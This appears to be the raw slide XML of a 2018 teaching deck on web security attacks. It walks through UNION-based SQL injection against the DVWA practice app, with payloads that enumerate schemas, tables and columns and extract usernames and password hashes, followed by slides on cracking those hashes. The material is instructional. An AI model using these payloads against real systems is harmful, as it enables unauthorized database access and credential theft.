          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Security Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:latin typeface="Bebas Neue" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4114800"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212"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13" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492960"/>
            <a:ext cx="3428640" cy="283320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214"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5409B9DF-A205-40EF-83B9-3EDE755598CD}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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reversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Analyst engages the target with full knowledge of its processes and operational security, but the target knows nothing of what, how, or when the Analyst will be testing. The true nature of this test is to audit the preparedness of the target to unknown variables and vectors of agitation. The breadth and depth depends upon the quality of the information provided to the Analyst and the Analyst’s applicable knowledge and creativity. This is also often called a Red Team exercise</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276"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77"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78"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B4D90D58-50C8-4F76-8BB4-9EE4E99E6539}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,table_name,3,4,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t> like 'user%'#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="692" name="Picture 6"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694"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r>
              <a:rPr lang="en-US" sz="4000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>Enumerating list of table names using SQL command with SQL injection technique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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8838720" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>‘ union all select 1,table_name,3,4,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="697" name="Picture 4"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="9981720" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,table_schema,3,4,5,6 from information_schema.tables#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="700" name="Picture 2"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>SQL function : concatenate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702"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4000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>MySQL CONCAT function is used to concatenate two strings to form a single string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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8305560" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,concat(table_schema,0x3a,table_name),3,4,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="705" name="Picture 3"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>SQL clause : WHERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707"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4000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>The WHERE clause is used to extract only those records that fulfil a specified criterion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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8457840" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema='dvwa'#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="710"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712"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r>
              <a:rPr lang="en-US" sz="4000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>Enumerating list of column names using SQL command with SQL injection technique</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,column_name,3,4,5,6 from information_schema.columns where table_schema='dvwa'#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="715"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458200" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration testing method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07944812"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1752600"/>
          <a:ext cx="7620000" cy="4373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a:xfrm>
            <a:off x="457200" y="6172201"/>
            <a:ext cx="3429000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B11D738E-8962-435F-8C43-147B8DD7E819}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/24/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492875"/>
            <a:ext cx="3429000" cy="283845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Footer Text</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BA9B540C-44DA-4F69-89C9-7C84606640D3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2524415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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717"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4400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>union all select column_name from table_name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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="7238520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,user,password,4,5,6 from users#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="720" name="Picture 3"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="9067320" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Or we can concatenate user and password together</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="723"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Crack the hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725"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Requirement : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Type of hash - (md5/ sha1 / crypt / salted /)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Tools for cracking - Online</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Online cracking tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="727" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="5638320" cy="3454200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="728" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895480" y="2743200"/>
            <a:ext cx="5944680" cy="3641400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095880" y="1219320"/>
            <a:ext cx="1828440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
